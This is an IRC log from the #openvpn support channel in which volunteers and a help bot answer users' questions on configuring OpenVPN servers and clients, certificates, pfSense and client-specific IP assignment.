As defined in --remote in the manpage 11:23 < vaillor> remote real ip? 11:23 < pekster> I haven't a clue. What host do you intend to connect to? Or if this is the OpenVPN "server" (the endpoint waiting for a connection) you don't specify any remote line 11:24 -!- sh_t [~sht@176.222.238.158] has joined #openvpn 11:30 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 248 seconds] 11:30 < vaillor> pekster 11:30 < vaillor> 87.20.100.100 11:30 < vaillor> it's the host real ip 11:31 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]] 11:31 -!- mikkel [~mikkel@80.71.132.15] has joined #openvpn 11:31 < vaillor> is the server 11:31 < pekster> Not the local hosts's IP. Remote is used to define the *remote* end, ie: your other VPN peer 11:31 < pekster> If that's correct, then yes, that's fine 11:32 < vaillor> so, now what i need to do to set these information on my iphone? 11:33 < pekster> Connect it? The iphone makes a bad test platform since logs/errors are harder to hunt down 11:33 < pekster> You're better off getting a working config somewhere else and importing it to the iphone 11:33 < pekster> Then it something doesn't work, you get logs without having to jump through hoops 11:34 < vaillor> ok, but never mind, i shouldn't get errors 11:36 < vaillor> so only these 3 line i need to config? 11:39 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 11:40 < xtz> failed to update database 11:40 < xtz> TXT_DB error number 2 11:40 < xtz> grrrrr 11:41 < pekster> You messed up your serial somehow; that error is an "index clash" 11:42 < pekster> http://www.mail-archive.com/openssl-dev@openssl.org/msg15628.html 11:42 <@vpnHelper> Title: [openssl.org #502] TXT_DB error number 2 (at www.mail-archive.com) 11:42 < xtz> already googled it and found my err 11:42 < xtz> forgot to source vars before issuing another cert 11:42 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 11:45 < vaillor> pekster, is there a way to specify a port? 11:47 < pekster> After the remote IP, or via --port 11:47 < pekster> See --remote and --port in the manpage for details 11:48 < vaillor> ok 11:48 < vaillor> so, i prepared a configuration file to export on the iphone 11:48 < vaillor> how to export also the key? 11:50 < pekster> copy it to the cwd you'll call the program from, or put it inline (which I believe is easier on the iphone.) I don't use/have an iphone so I can't help you there 11:50 < pekster> !inline 11:50 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 11:52 < tabakhase> remoind me, what where "wrong" in allowing multiple connections for the same cert? (appart from ensuring that someone cant just give 'his key to a new user') 11:52 < tabakhase> vaillor using openvpn from cydia? 11:52 < vaillor> no 11:53 < tabakhase> then "not" afaik... openvpn issnt supported by stock iOS 11:53 < pekster> Yes it is 11:53 < pekster> !iphone 11:53 <@vpnHelper> "iphone" is (#1) http://www.zdnet.com/blog/hardware/ubuntu-lucid-lynx-1004-can-read-your-iphones-secrets/8424 <-- be aware of that before putting your keys on an iphone or (#2) OpenVPN is now available for iOS in the App Store or (#3) https://community.openvpn.net/openvpn/wiki/IOSinline 11:53 < tabakhase> (using the thing from cydia you form a zip with certs+config and just upload it "to that programm" using itunes) 11:54 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 11:54 -!- gitsu-sa [~gtu@unaffiliated/gitsu-sa] has quit [Ping timeout: 252 seconds] 11:55 < tabakhase> uhhh - what am i reading there? no JB required anymore? 11:55 < tabakhase> is that than not supporting the gw-redirect or did they managed to make that all happen now? 11:55 < pekster> tabakhase, it's bad practice to share any form of a private key, be it X509 keypairs for openvpn, ssh private keys, etc. You can't tell "who" connected based on CN, nor can you revoke just one of their certs for access 11:55 < pekster> Should be fully support minus tap, I believe 11:56 < pekster> !android 11:56 <@vpnHelper> "android" is (#1) an open source OpenVPN client for ICS is available in Google Play, look for OpenVPN for Android. FAQ is here: http://code.google.com/p/ics-openvpn/wiki/FAQ or (#2) If running cyanogenmod, openvpn and busybox are already installed for you! or (#3) If you do not have cyanogenmod or ICS, but your device is rooted, you can use android-openvpn-installer and openvpn-settings from the 11:56 <@vpnHelper> market 11:56 < pekster> Yes, so I think >=JB for the android APIs to work without root 11:57 < tabakhase> hm, i can just remember it where "the" reason to JB my ipad2... but thats been a year ago or so... 12:01 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 12:03 < pekster> Oh, jailbreak: JB to mean means Jelly Bean for Android... 12:03 < pekster> to me* 12:03 < vaillor> pekster, how do i identify the client and server? 12:03 < vaillor> the config is the same 12:04 < pekster> You need to read the howto a bit closer. http://openvpn.net/index.php/open-source/documentation/miscellaneous/78-static-key-mini-howto.html 12:04 <@vpnHelper> Title: Static Key Mini-HOWTO (at openvpn.net) 12:04 -!- marksaitis [~marksaiti@86.28.107.165] has joined #openvpn 12:06 < vaillor> so, another question is: what difference is there between: openvpn-install-2.3.0-I004-i686.exe 12:06 < vaillor> and tunnelinstall.msi ? 12:06 < vaillor> oh sorry 12:06 < vaillor> privatetunnel.msi 12:07 <+EugeneKay> PrivateTunnel is the proprietary version 12:07 <+EugeneKay> !download 12:07 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 12:07 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 12:11 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-safvatvxnhzshede] has quit [] 12:14 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 12:17 -!- master_o1_master [~master_of@p4FF249DB.dip.t-dialin.net] has joined #openvpn 12:19 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-oezetszxfobedvxh] has joined #openvpn 12:20 -!- master_of_master [~master_of@p4FF2449F.dip.t-dialin.net] has quit [Ping timeout: 256 seconds] 12:20 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 12:31 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 12:37 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [Ping timeout: 252 seconds] 12:42 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 12:47 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 13:02 -!- MFSOT_ [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn 13:03 < MFSOT_> Hello all - I'm having trouble connecting to my LAN via pfSense openVPN server, no on over there seems to be able to figure this out, I have to think it's a simplistic answer when it's figured out. Basically I'm connected via client, firewall is wide open and I can't access LAN 13:04 <@ecrist> !configs 13:04 < MFSOT_> I can ping the gateway (pfSense) but can't ping any members of the LAN 13:04 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 13:04 <@ecrist> !diagram 13:04 <@vpnHelper> "diagram" is You can use a site such as http://gliffy.com to create a network diagram as well as programs such as Visio, Dia, or OmniGraffle 13:04 <@ecrist> !logs 13:04 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 13:04 <@ecrist> !goal 13:04 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 13:08 < MFSOT_> http://pastebin.com/Dwf1TPGF 13:08 < MFSOT_> windows client log 13:09 < MFSOT_> win 7 pro client is 2.3 13:12 -!- marksaitis [~marksaiti@86.28.107.165] has quit [Ping timeout: 245 seconds] 13:12 <@ecrist> waiting for the rest of it 13:13 < MFSOT_> ecrist obtaining it 13:13 < MFSOT_> I'd love to give you the config off the pfsense box but don't know of anyway of getting it to this machine 13:14 < MFSOT_> so I'll take some screen shots 13:15 < MFSOT_> I'm on pfSense 2.01 13:15 < rob0> !pfsense 13:16 <@vpnHelper> "pfsense" is dont use the web gui for configuring openvpn, you need to understand the config and logfiles 13:16 < rob0> um, it's there somewhere 13:16 <@ecrist> pfsense keeps it as a config file somehwere, trying to remeber where scott said it was 13:16 <@ecrist> /var/etc/openvpn/ 13:17 -!- Kendall [~gjones@173-165-28-227-Illinois.hfc.comcastbusiness.net] has left #openvpn [] 13:20 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has joined #openvpn 13:24 < MFSOT_> ecrist, I'll try to find it in shell and cpy it to a usb, just not quite sure how I'll accomplish that 13:26 <@ecrist> the the file and copy/paste to pastebin 13:27 < MFSOT_> i get that, but pfsense is just a shell unless I'm on the gui so I need to take it off the pfsense box and get it to this box that I'm talking to you on 13:27 <@ecrist> no 13:27 <@ecrist> open a shell, type cat where is the path and filename of the config 13:28 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 245 seconds] 13:28 <@ecrist> the use your mouse, select the text, and paste it to pastebin 13:30 < MFSOT_> it's a different box, are you saying I can paste to pastebin via CLI on psSense? mouse doesn't work in CLI on pfSense... I'll just type it out and paste it 13:31 <@ecrist> you can't use ssh? 13:37 < MFSOT_> I've got nothing ecrist, I appreciate your help - I don't know a way to copy the text in CLI of pfSense as I can't use a mouse and can't get off of the current line my cursor is on 13:38 < MFSOT_> best I can do is past some images at imgur of my config, but if that's not enough I understand 13:38 < pekster> texual terminal select is provided on almost any terminal, from xterm under Unix/Linux to putty under Windows. You can't ssh into your pfsense box with such a standard terminal? 13:39 < pekster> Your life will be a lot easier if you do that first, and then attempt to configure your OS after you have a proper terminal interfce to it 13:40 <@ecrist> MFSOT_: email it to yourself 13:41 < MFSOT_> I'll putty in 13:41 <@ecrist> damn you 13:41 <@ecrist> putty is ssh 13:41 <@ecrist> you can use the mouse in putty to copy text 13:41 * ecrist gives up 13:42 < pekster> Well now, I also use RS-232 via putty when I need to jack into a switch or serial boot console ;) 13:42 <@ecrist> you can still use the mouse to copy text. 13:43 <@ecrist> :P 13:43 < pekster> When the console finally sends it, yes :D 13:48 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn 13:51 -!- MFSOT_ [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Ping timeout: 250 seconds] 13:55 < neilhwatson> What is the mechanism used on this channel to refer to documentation via !? 13:55 -!- Orbi [~opera@109.129.1.99] has joined #openvpn 13:57 < pekster> neilhwatson: The local bot is connected just like any other user and runs code to listen for commands and reply to them 13:58 < pekster> Pretty common on IRC really 13:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza] 13:58 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has joined #openvpn 14:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Remote host closed the connection] 14:04 -!- pelle2 [~palle@178-132-74-156.cust.azirevpn.net] has joined #openvpn 14:05 < pelle2> is it possible to access a LAN behind an openvpn server if the router on the lan is using the same IP as a machine on the LAN from where i'm connecting? 14:05 < pelle2> or will there be a conflict regardless how i config things 14:05 < pelle2> can i config the server to somehow go around this 14:07 < pekster> You can add a more-specific route (say a /32 IPv4 route) on the client to override the link-local route, but it's best to fix your issue properly by avoiding conflicting network ranges 14:09 < pekster> And of course that breaks if you actually need to reach the local version of that IP (for your router, DNS, etc) 14:09 < pekster> What's stopping you from not overlapping network ranges? 10/8 is a nice and big place... 14:10 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: Lost terminal] 14:12 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:13 < MFSOT> http://pastebin.com/XiGLmlfL = client http://pastebin.com/Dwf1TPGF = client log http://pastebin.com/iBp6uWRm = server config 14:14 < MFSOT> GOAL is to be able to vpn into our LAN and access file server 14:14 < MFSOT> we don't need a diagram of our network it's internet>pfsense/openVPN>LAN 14:15 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 14:17 -!- Devastator [~devas@177.18.198.56] has joined #openvpn 14:20 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 14:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 14:24 < pelle2> pekster: i will have to change the ip for my LAN subnet then, dont know what that will do to all my rules and NATs in pfsense (router) 14:24 < pelle2> but i guess that would be the best alternative 14:28 < pekster> MFSOT: Your server is operating in multi-client mode with net30 topology but you've configured declared a PtP IP on line 23 of the client config, which you don't want. You don't need the route on line 24 as the server pushes it. No idea why you've speciifed "lport 0" on line 20 either; port "0" tends to cause problems, assuming it works at all. Maybe you wanted 'nobind' instead? The local directive on line 17 matches the one used by ... 14:28 < pekster> ... the server, which is invalid unless both client & server openvpn instances are runnign on the same box 14:29 < pekster> MFSOT: I'd start over with the official howto, becuase there's a lot wrong with your setup: 14:29 < pekster> !howto 14:29 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 14:30 < MFSOT> pekster - this is new to me - set it up via GUI 14:30 < MFSOT> I want multi clients 14:30 < pekster> Yea, don't do that. Read the official howto, because we don't support poorly designed frontends here 14:30 < MFSOT> ok 14:31 < MFSOT> so I can set it up behind the scenes and import it to pfSense? 14:31 < pekster> Probably; I don't use pfsense, so I don't know how its init system is designed 14:31 < pekster> You can likely just replace the config file with your own though 14:36 < MFSOT> thank you for your help 14:37 < MFSOT> same to ecrist 14:38 -!- mete [~mete@mete.shell.la] has quit [Ping timeout: 248 seconds] 14:42 -!- neilhwatson [~neilhwats@CPE00e081b5ee1e-CMbc140134c320.cpe.net.cable.rogers.com] has quit [Quit: leaving] 14:44 -!- mete [~mete@mete.shell.la] has joined #openvpn 14:50 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has quit [Ping timeout: 240 seconds] 14:53 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 14:56 -!- mikkel [~mikkel@80.71.132.15] has quit [Quit: Leaving] 15:17 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 264 seconds] 15:21 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 15:24 -!- NuclearMeltdown [~rep@unaffiliated/antiliberal] has quit [Ping timeout: 276 seconds] 15:37 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 15:45 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 15:46 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 15:49 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Read error: Connection reset by peer] 15:52 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Read error: Connection reset by peer] 15:52 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has joined #openvpn 15:54 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 15:54 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 15:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 16:02 -!- MFSOT [~MFSOT@226.sub-70-215-20.myvzw.com] has quit [Ping timeout: 256 seconds] 16:05 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 18.0.2/20130201065344]] 16:08 < vaillor> how to configure openvpn as a server? 16:09 < pekster> The howto is the right place to start with that broad of a question. In the abstract, you configure it without a 'remote' directive and it'll start up and wait for connections, thus acting as a "server" 16:09 < pekster> !howto 16:09 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 16:10 < vaillor> thank you 16:24 -!- Orbi [~opera@109.129.1.99] has left #openvpn [] 16:30 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 17:19 -!- vect0rx [vectorx@havok.org] has joined #openvpn 17:22 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 17:30 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 17:53 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Ping timeout: 250 seconds] 17:58 < vaillor> do i need to create certificates also on the clients? 17:59 < pekster> Yes, unless you want to use --user-auth-pass-verify by itself to authenticate users 18:00 < vaillor> in this way i need to set pass on the server? 18:00 < pekster> That should be: --auth-user=pass-verify 18:00 < pekster> With a dash. Typing fail 18:01 < pekster> That directive takes a script or executable command to perform the authentication 18:01 < pekster> See the manpage for details 18:02 < pekster> Combined with --client-cert-not-required you just need the ca.crt (so the client can verify the server.) The server would then require a user/pass and verify it according to the script. This is less secure, but sometimes more convenient 18:02 < vaillor> so, when i import config to a client, i imported also key 18:02 < vaillor> why do i need to generate another key? 18:03 < pekster> You cannot (or should not, at least) use the server's keypair for the client 18:03 < pekster> That's all measures of wrong 18:03 < pekster> You are trying to set up X509 for multi-client server support, right? 18:03 < vaillor> i haven't understood the difference between client and server in vpn configuration 18:04 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:05 < pekster> When used in 'mode server', you have a "server" that listens for incoming client connections, and has a cert signed with special "server" attributes. Clients get unique keypairs of their own, signed with special "client" attributes. For a secure environment, clients should check that the cert they get is a correctly issued "server" cer 18:05 < pekster> !mitm 18:05 <@vpnHelper> "mitm" is (#1) http://openvpn.net/index.php/documentation/howto.html#mitm to know about stopping Man-in-the-Middle attacks by signing the server cert specially or (#2) use !servercert to generate the server cert manually or use the easy-rsa build-key-server script to build your server certificates or (#3) then use: remote-cert-tls server in the client config 18:06 < vaillor> ok, so, if i need to establish start the vpn connection from server to client, i can't 18:06 < vaillor> but i need at first to initiate i t from client to server 18:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 18:07 < pekster> Right. By definition the server listens for connections 18:08 < pekster> How else do you expect it to support multiple clients? 18:08 < vaillor> in a normal lan network there isn't a "server" 18:08 < vaillor> but is there only a switch that connects all hosts 18:09 < pekster> The server is the end that listens for connections. The client initiates the connection 18:09 < pekster> In p2p mode there is no clear role of "server" vs "client", but in multi-client mode ('mode server' in openvpn config terms) the distinction is explicit 18:10 < pekster> One end must take the TLS Server role for the TLS handshake negotation, and this end also listens for inbound connections on a defined port 18:10 < vaillor> in p2p mode both side are client and server at the same time? 18:10 < pekster> In p2p it's better to think of them as both "peers" 18:11 < pekster> Usually one end still listens and the other has the remote directive, but they could both have remote directives so either end tries to re-open a connection if they have data to send and the connection isn't considered established yet 18:11 < vaillor> so, in this way, i can initiate the connection from both sides? 18:11 < pekster> Sort of. UDP has no notion of "initiating" a connection - it's just a stream of packets with no defined start or end 18:12 < pekster> Firewalls often care, but the UDP protocol doesn't 18:12 < pekster> If some of the basics are confusing, here's a more basic guide to understanding how TCP/IP works that might provide background reading: 18:12 < pekster> !tcpip 18:13 <@vpnHelper> "tcpip" is http://www.redbooks.ibm.com/redbooks/pdfs/gg243376.pdf See chapter 3.1 for useful basic TCP/IP networking knowledge you should probably know 18:13 < vaillor> pekster, and how can i specify to use it in client-server mode or in p2p mode? 18:13 < pekster> The --mode directive 18:14 < pekster> Using any of --server, --server-bridge, or --client directives imply mode server or client as well 18:14 < pekster> Each are further defined in the manpage 18:41 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 18:41 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 18:41 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:41 -!- mode/#openvpn [+o krzee] by ChanServ 18:51 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 18:56 -!- ravel_exe [~ravel_exe@175.136.85.24] has joined #openvpn 18:57 < vaillor> pekster, how do i need to put configuration file and key file in openvpn over debian? 18:57 < pekster> Same as any other standard distro; drop the config in /etc/openvpn/ named whatever.conf and start the initscript 18:58 < pekster> IIRC debian's initscript just blindly starts any *.conf there; maybe /etc/default/openvpn can tune that, but it's been a while since I ran openvpn+debian so you'd want to check that 18:59 -!- ravel_exe [~ravel_exe@175.136.85.24] has quit [Remote host closed the connection] 19:01 < vaillor> so i only copy .conf in /etc/openvpn 19:01 < pekster> Probably your keys & certs too, unless they're all inline 19:22 -!- p3rror [~mezgani@41.249.23.19] has quit [Read error: Connection reset by peer] 19:24 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 19:26 -!- raidz is now known as raidz_away 19:27 -!- JSharpe [~JSharpe@46.165.210.17] has quit [Quit: Leaving] 19:31 -!- pinion [~pinion@unaffiliated/pinion] has quit [Quit: leaving] 19:38 -!- oc80z is now known as [oc80z] 19:58 -!- Devastator [~devas@177.18.198.56] has quit [Changing host] 19:58 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 20:15 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 20:19 -!- TriJetScud [~TriJetScu@2001:470:e97f:1003:215:5dff:fe07:4806] has quit [Quit: ZNC - http://znc.in] 20:22 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 260 seconds] 21:08 -!- sh_t [~sht@176.222.238.158] has quit [Ping timeout: 252 seconds] 21:16 -!- MFSOT [~MFSOT@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Quit: Leaving] 21:16 -!- sh_t [~sht@31.7.62.130] has joined #openvpn 21:20 -!- sh_t [~sht@31.7.62.130] has quit [Ping timeout: 255 seconds] 21:21 -!- sh_t [~sht@lu.privatevpn.com] has joined #openvpn 21:26 -!- sh_t [~sht@lu.privatevpn.com] has quit [Ping timeout: 245 seconds] 21:28 -!- sh_t [~sht@NL2.privatevpn.com] has joined #openvpn 21:46 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 252 seconds] 21:47 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 21:48 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 252 seconds] 22:04 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 22:06 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-jfwecqjheggpxujq] has quit [Ping timeout: 252 seconds] 22:06 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-oezetszxfobedvxh] has quit [Ping timeout: 256 seconds] 22:07 -!- paccer [uid4847@gateway/web/irccloud.com/x-alqdhrhtspqzjhoz] has quit [Ping timeout: 246 seconds] 22:08 -!- b00gz_ [~uid6869@gateway/web/irccloud.com/x-kkrfkdubixvsunqu] has quit [Ping timeout: 260 seconds] 22:21 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 248 seconds] 22:22 -!- aaaar0n [~no@c-174-56-147-242.hsd1.sc.comcast.net] has joined #openvpn 22:22 -!- aaaar0n is now known as ar0nic 22:26 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has quit [Ping timeout: 264 seconds] 22:28 -!- CEnnis91 [uid3543@gateway/web/irccloud.com/x-fulzpfazgvsxtjda] has joined #openvpn 22:33 -!- `nand` [~nand@2a01:4f8:d13:5245::2] has joined #openvpn 22:41 -!- [fred] [fred@konfuzi.us] has joined #openvpn 22:45 -!- [fred] [fred@konfuzi.us] has quit [Ping timeout: 246 seconds] 22:58 -!- [fred] [fred@konfuzi.us] has joined #openvpn 23:18 -!- ar0nic [~no@c-174-56-147-242.hsd1.sc.comcast.net] has quit [Ping timeout: 255 seconds] 23:38 -!- latenite [~latenite@138.77.122.195] has joined #openvpn 23:43 < latenite> Hi folks, For the "client-config-dir ccd" setup I need the cliet common name. Getting this: Subject: C=US, ST=CA, L=Berlin, O=private, CN=client_x301/emailAddress=kai@poeritz.de 23:43 < latenite> Would the common name be: client_x301 23:44 < latenite> or 23:44 < latenite> client_x301/emailAddress=kai@poeritz.de 23:44 < pekster> client_x301 23:44 < pekster> The extra part is just the emailAddress attribute 23:44 < latenite> pekster, thank you. 23:45 < latenite> pekster, I just talked to my ISP. And I will try not to use DNAT but rather by 2 more IPs 23:45 < latenite> What do you think of that? Thats technicly better. Right?! 23:46 < pekster> Anything that avoids NAT is good, although you still need to be careful about on-link vs routed 23:46 < pekster> It's a lot easier to use tap if upstream expects it to be on-link, or you can use solutions like arp proxying 23:47 < latenite> pekster, latenite <- laughs :D 23:47 < pekster> Or a 1:1 NAT to rfc1918 I suppose, but then you're back to some NAT again (albiet more managable) 23:47 < latenite> pekster, you throw all these cool new words at me. I get dizzy :D 23:47 < latenite> on-link vs routed ? 23:48 < pekster> How are you getting the IPs? Will your network provider be routing them to the IP of your existing host, or do you get additional IPs on the subnet (aka on-link) 23:49 < latenite> pekster, that I dont know jet. Its kind of hard to get IP from them. One has to fill out a form and politrly ask for then...even tell them why one want then and what for 23:49 < latenite> I will now in a couple hours which and if I get the IPs 23:50 < latenite> for now I try to setup the vpn server so it pushed static IP to the clients 23:52 < latenite> pekster, so "on-link" meen IN the same subnet?! and routed means you get to add a default route to the machine that has the new IP to reach the host? 23:55 < pekster> If I understand you correctly, yes 23:58 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 23:58 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 23:58 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 23:58 -!- mode/#openvpn [+o krzee] by ChanServ --- Day changed Tue Mar 05 2013 00:01 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 272 seconds] 00:03 -!- b00gz_ [uid6869@gateway/web/irccloud.com/x-kigwgkzeuuhujksq] has joined #openvpn 00:04 -!- HectorBarbossa [uid7850@gateway/web/irccloud.com/x-lamyntzwqdjvorgy] has joined #openvpn 00:05 < latenite> pekster, nice. ok. 00:05 < latenite> pekster, can you show me an example of ./ccp/clientfile ? 00:05 < latenite> What can/has to be in there besides: 00:05 < latenite> ifconfig-push ${clientip} 00:05 <@krzee> !ccd 00:05 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 00:06 < latenite> krzee, (nice nick by the way) :D 00:07 < latenite> which would be the "put the config options for the client in" ? 00:07 <@krzee> what are you trying to do? 00:07 < latenite> what else is essentail besides the IP 00:07 <@krzee> thats for you to answer, not me 00:07 <@krzee> i cant decide your goals 00:08 < latenite> krzee, I want my client to have one of the IP in my pool. So it can be publicly accessable through the VPN 00:08 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 00:09 <@krzee> i see 00:09 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 00:09 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 00:09 <@krzee> do you have a range of IPs that was routed to you? 00:09 < latenite> krzee, would I only need to push the IP. Or also the gateway, netmask ... 00:10 < latenite> krzee, "range"..kind of. I have to extra IPs 00:10 <@krzee> when you say "in my pool" you mean the pool used in --server? 00:11 < latenite> krzee, no I meen pool as in "what my IPS provides me with" 00:11 <@krzee> hmm if pekster was suggesting something go with whatever he's saying 00:11 < latenite> krzee, I figured I had to tell the server somehow that there are IP it can select from. I did not knwo how though 00:12 < pekster> Well, we never firged out how the IPs are available, so any suggestions I had were as-yet theoretical 00:12 <@krzee> personally i'ld prolly end up doing bi-directional NAT in your case, he prolly has a cleaner way if he was talking about pushing an ip in ccd 00:12 <@krzee> ohh ok, so you were thinking what i was orig thinking 00:12 <@krzee> him saying "i just have some extra IPS" made me think thats not going to be doable 00:12 <@krzee> ... didnt sound like he has blocks routed to him 00:13 < pekster> I'm guessing it'll just be on-link, so either a tap bridge, arp-proxy, or server holds all 3 IPs and 1:1 NAT 00:13 -!- paccer [uid4847@gateway/web/irccloud.com/x-ulcvmydcnprnqyfl] has joined #openvpn 00:13 < pekster> If they're routed, then PtP if the clients suppor that, or trickery if the client's are Windows 00:14 < pekster> pick(cat->skin); 00:15 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 00:16 -!- Dr_Wendy [~FuckOff@208.102.159.64] has joined #openvpn 00:18 < Dr_Wendy> Is this the appropriate place to ask for a bit of help? 00:19 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 245 seconds] 00:19 < Dr_Wendy> It seems like my issue is indeed with my iptables... but i cannot see what i am missing 00:20 < Dr_Wendy> i had openvpn setup just fine on this server... then i switched my distro to wheezy instead of squeeze 00:20 -!- latenite [~latenite@138.77.122.195] has joined #openvpn 00:20 < Dr_Wendy> now the connection is fine... but no data is getting through 00:21 < latenite> pekster, krzee 